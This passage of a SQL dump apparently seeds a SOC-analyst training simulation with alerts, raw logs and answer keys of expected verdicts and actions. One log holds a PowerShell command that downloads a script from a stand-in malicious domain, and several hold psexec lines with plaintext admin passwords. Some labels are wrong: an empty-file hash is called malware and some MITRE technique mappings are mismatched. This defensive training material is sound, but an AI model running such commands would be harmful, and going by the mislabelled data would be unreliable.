NULL, 0),
(1879, 'Potential Lateral Movement Detected Using PSExec', 'low', 'Corelight', 'PSExec tool used to execute a command on another machine within the network. Likely a scheduled administrative task.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"admin-pc\",\"command_line\":\"psexec \\\\\\\\192.168.1.10 -u admin -p password cmd.exe /c dir\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.10 -u admin -p password cmd.exe /c dir\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for administrative task scheduling\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity matches a known pattern for scheduled administrative tasks.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1880, 'Failed Login Attempts Detected', 'medium', 'Darktrace', 'Multiple failed login attempts detected on a user account from an external IP. Likely triggered by a misconfigured application.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"username\":\"test_user\",\"hostname\":\"web-server\",\"failed_attempts\":20}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 5 times for failed login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"test_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Testing account used internally\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempts are consistent with a testing process or misconfigured application.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1881, 'Outbound Traffic to Known Malicious IP', 'critical', 'Suricata', 'Outbound traffic was detected to a known command and control server, indicating a potential compromise.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.200\",\"hostname\":\"infected-pc\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address indicating potential victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with C2 activity and malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The outbound connection to a known C2 server indicates a compromised system.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1882, 'Routine Vulnerability Scan Activity', 'low', 'Wireshark', 'Network traffic patterns associated with vulnerability scans detected. This is part of the regular security assessment schedule.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.35\",\"username\":\"security_admin\",\"hostname\":\"vuln-scan-host\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by vulnerability scanner\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of target system\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This pattern matches the routine scanning activities performed as part of scheduled maintenance.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1883, 'Routine Vulnerability Scanning Detected', 'low', 'Zeek', 'A network scan was detected originating from an internal IT asset. This was identified as part of a scheduled vulnerability assessment.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin_scanner\",\"hostname\":\"scanner01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal asset performing authorized scans.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_scanner\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Username belongs to authorized IT personnel.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity is part of routine vulnerability scans and is not malicious.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1884, 'Potential Phishing Email Detected', 'medium', 'Darktrace', 'An email was received containing a suspicious URL. Further investigation revealed it was a test email from an internal security team.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jane.doe@company.com\",\"hostname\":\"mailserver1\",\"email_sender\":\"security@test.company.com\",\"domain\":\"company.com\",\"url\":\"http://test-phishing.com\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"security@test.company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Email Systems\",\"verdict\":\"clean\",\"details\":\"Email from internal security team for training purposes.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://test-phishing.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL used for phishing awareness training.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was part of an internal phishing simulation test.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1885, 'Unauthorized Application Execution Alert', 'high', 'Corelight', 'Execution of an unauthorized application was detected on an internal server. This was part of a software update process initiated by IT.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"it_admin\",\"hostname\":\"server02\",\"command_line\":\"/usr/bin/update-software\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal server IP performing authorized tasks.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/update-software\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Software Repository\",\"verdict\":\"clean\",\"details\":\"Command is part of a standard software update process.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution is part of a legitimate software update.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1886, 'Suspected Data Exfiltration Attempt', 'high', 'Suricata', 'A high volume of outbound traffic was detected from a user workstation. This was later identified as a routine data backup operation.', 'Data Exfil', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.50\",\"username\":\"backup_user\",\"hostname\":\"workstation07\",\"request_body\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal workstation performing authorized backup.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Destination IP is a trusted backup service provider.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic is part of a scheduled data backup to an external provider.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1887, 'C2 Beaconing Activity Detected', 'critical', 'Wireshark', 'Suspicious outbound connections were detected indicative of command and control activity. Analysis confirmed malicious intent.', 'C2 Beaconing', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"195.23.45.78\",\"username\":\"unknown\",\"hostname\":\"compromised-host\",\"request_body\":\"\",\"command_line\":\"\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"195.23.45.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected activity is consistent with command and control operations by known threat actors.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1888, 'Unauthorized PSExec Usage Detected on Internal Network', 'medium', 'Zeek', 'An internal IP was observed attempting lateral movement using PSExec. No known malicious activity reported on the internal IP.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.1.10\",\"dst_ip\":\"10.1.1.20\",\"username\":\"admin_user\",\"hostname\":\"server01\",\"command_line\":\"psexec \\\\\\\\10.1.1.20 -u admin_user -p password cmd.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address, no external reports\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.1.1.20 -u admin_user -p password cmd.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"clean\",\"details\":\"Routine administrative command execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was conducted by an authorized IT admin performing maintenance.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1889, 'External Network Scan Detected', 'low', 'Suricata', 'Multiple network connections from an external IP were flagged as suspicious but identified as part of a routine vulnerability scan by a trusted third-party vendor.', 'Scan', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:35:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"198.51.100.2\",\"dst_ip\":\"192.168.1.100\",\"username\":\"N/A\",\"hostname\":\"N/A\",\"request_body\":\"N/A\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP belongs to a trusted security vendor conducting authorized scans\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"scan\",\"analysis_notes\":\"The IP is part of a scheduled vulnerability assessment by a known vendor.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1890, 'Suspicious Email with Benign Content', 'low', 'Proofpoint', 'An email was flagged for suspicious content but was confirmed as a marketing email from a legitimate source.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.30\",\"dst_ip\":\"192.168.2.5\",\"username\":\"jane.doe\",\"hostname\":\"workstation01\",\"email_sender\":\"marketing@trustedsource.com\",\"request_body\":\"Check out our new products at https://trustedsource.com\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"marketing@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Email address verified as legitimate marketing contact\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Website is verified and safe with SSL certificate\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"This email was a legitimate marketing communication.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1891, 'Routine System Health Check Misinterpreted as C2 Beaconing', 'medium', 'Darktrace', 'Regular system health checks were mistaken for C2 beaconing due to their predictable pattern and external connections.', 'C2 Beaconing', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T20:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"203.0.113.50\",\"username\":\"system_check\",\"hostname\":\"monitoring_server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"IP associated with monitoring services, no malicious reports\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used for system health monitoring\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The network traffic was part of routine health checks performed by internal monitoring systems.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1892, 'Suspicious PowerShell Execution Detected', 'high', 'Wireshark', 'A suspicious PowerShell command was executed from an internal machine, indicating potential misuse.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.15\",\"dst_ip\":\"N/A\",\"username\":\"user123\",\"hostname\":\"comp02\",\"command_line\":\"powershell.exe -NoProfile -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/script.ps1 -OutFile C:\\\\temp\\\\script.ps1\\\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/script.ps1 -OutFile C:\\\\temp\\\\script.ps1\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL linked to malware hosting\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command and URL are both associated with malware activity, indicating a true positive.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1893, 'Suspicious C2 Beaconing Detected', 'high', 'Zeek', 'A potential C2 beaconing pattern was detected from an external IP to an internal host. This could indicate a compromised machine communicating with a malicious server.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:34:56Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.101\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for C2 activity, indicating a likely compromise.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1894, 'Routine IT Vulnerability Scanning Detected', 'low', 'Suricata', 'Network traffic patterns characteristic of vulnerability scanning were detected from an internal scanning server. This aligns with the scheduled IT security audits.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"scan-server\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for scheduled scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for vulnerability scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity is consistent with routine internal scans.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1895, 'Misconfigured Legacy Application Traffic', 'medium', 'Corelight', 'Anomalous traffic resembling C2 communication was generated by a legacy application due to misconfiguration. No malicious indicators found.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"172.16.0.100\",\"dst_ip\":\"198.51.100.25\",\"username\":\"legacy_app_user\",\"hostname\":\"legacy-server\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"External IP with no malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic pattern is due to a known issue with the application configuration.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1896, 'Authorized Administrative Backup Detected', 'low', 'Darktrace', 'Large volumes of data transfer were detected from a file server to an external backup service. The activity matches the scheduled backup processes.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"203.0.113.200\",\"username\":\"backup_admin\",\"hostname\":\"fileserver-02\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for backup\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"External backup service IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Data transfer aligns with known backup schedules, indicating no threat.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1897, 'Benign System Health Check Traffic', 'low', 'Wireshark', 'Detected network traffic from an internal monitoring tool performing standard system health checks. No malicious indicators were found.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:50:20Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"\",\"hostname\":\"monitoring-tool\",\"command_line\":\"\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for monitoring\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The detected traffic is consistent with scheduled health checks by IT.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1898, 'Unauthorized Lateral Movement Detected via PSExec', 'high', 'Darktrace', 'An internal host attempted unauthorized lateral movement using PSExec. The activity was detected between two internal systems.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"10.0.0.60\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-SERVER01\",\"command_line\":\"psexec \\\\\\\\10.0.0.60 -u admin -p password cmd.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a finance department workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a finance department server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.0.60 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec command often used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with administrator credentials indicates a potential unauthorized access attempt for lateral movement.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1899, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'Network traffic pattern resembling vulnerability scanning was detected. This matches the known schedule for routine IT scans.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"scanner\",\"hostname\":\"IT-Server\",\"command_line\":\"nmap -sS 192.168.1.101\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to IT department\'s scanning server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP belongs to a network device routinely scanned for vulnerabilities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Nmap scan detected, part of scheduled vulnerability assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity matches the schedule for routine IT vulnerability scans and poses no threat.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1900, 'Authorized Administrative Backup Traffic', 'low', 'Corelight', 'Data transfer detected between servers, matching the pattern of scheduled administrative backups.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.51\",\"username\":\"backup_user\",\"hostname\":\"BACKUP-SERVER\",\"command_line\":\"rsync -av /data 192.168.1.51:/backup\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is associated with the primary backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.51\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP is associated with the target backup 